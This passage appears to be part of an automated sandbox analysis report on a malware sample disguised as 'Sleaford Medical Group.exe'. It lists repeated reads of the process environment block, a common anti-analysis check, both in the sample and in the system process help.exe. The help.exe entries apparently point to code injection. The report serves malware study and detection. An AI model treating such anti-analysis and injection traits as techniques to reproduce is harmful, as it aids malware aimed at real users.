      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3AB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E461074 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E452073 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E464015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E464015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E417016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E417016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E417016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3B0050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3B0050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3CF0BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3CF0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3CF0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3D90AF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E42B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E42B8D0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E42B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E42B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E42B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E42B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E399080 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E413884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E413884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3958EC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3940E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3940E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3940E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3B4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3B4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3B4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3B4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3B4120 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E399100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E399100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E399100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E39B171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E39B171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E39C962 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3BB944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3BB944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C61A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C61A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E4241E8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3C2990 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3BC182 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E3CA185 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E39B1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E39B1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E39B1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E4549A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E4549A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E4549A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E4549A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E4169A6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E4151BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E4151BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E4151BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_1E4151BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_0056661B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_00566601 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_0056662E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_00563282 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_0056532B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Sleaford Medical Group.exeCode function: 22_2_00565BDE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_0388138A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F3B7A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F3B7A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_0387D380 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037CDB60 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037CF358 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03895BA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037CDB40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_038453CA mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_038453CA mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_0388131B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037EDBE9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03898B58 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F4BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F4BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F4BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F2397 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037FB390 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037D1B8F mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037D1B8F mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037C9240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037C9240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037C9240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037C9240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037EA229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037EA229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037EA229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037EA229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037EA229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037EA229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037EA229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037EA229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037EA229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037E3A1C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037CAA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037CAA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037C5210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037C5210 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037C5210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037C5210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037D8A0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F2AE4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_0388AA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_0388AA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03804A2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03804A2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F2ACB mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037DAAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037DAAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037FFAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03854257 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037C52A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037C52A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037C52A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037C52A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037C52A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_0388EA55 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_0387B260 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_0387B260 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037FD294 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037FD294 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03898A62 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_0380927A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037CB171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037CB171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037CC962 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_038469A6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_038849A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_038849A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_038849A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_038849A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037EB944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037EB944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_038451BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_038451BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_038451BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_038451BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037E4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037E4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037E4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037E4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037E4120 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_038541E8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037C9100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037C9100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037C9100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037CB1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037CB1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037CB1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F61A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F61A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F2990 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037FA185 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037EC182 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03843884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03843884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037E0050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037E0050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_038090AF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037EA830 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037EA830 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037EA830 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037EA830 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_0385B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_0385B8D0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_0385B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_0385B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_0385B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_0385B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037DB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037DB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037DB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037DB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037C58EC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03847016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03847016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03847016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03894015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03894015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037C40E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037C40E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037C40E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037FF0BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037FF0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037FF0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037F20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03882073 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037C9080 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03891074 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03847794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03847794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03847794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037DFF60 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037DEF40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037FE730 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037C4F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037C4F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037EF716 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037FA70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037FA70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_038037F5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_0389070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_0389070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_0385FF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_0385FF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03898F6A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037D8794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_0385FE87 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037EAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037EAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037EAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037EAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037EAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_037D766D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_038446A7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03890EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03890EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\help.exeCode function: 28_2_03890EA5 mov eax, dword ptr fs:[00000030h]
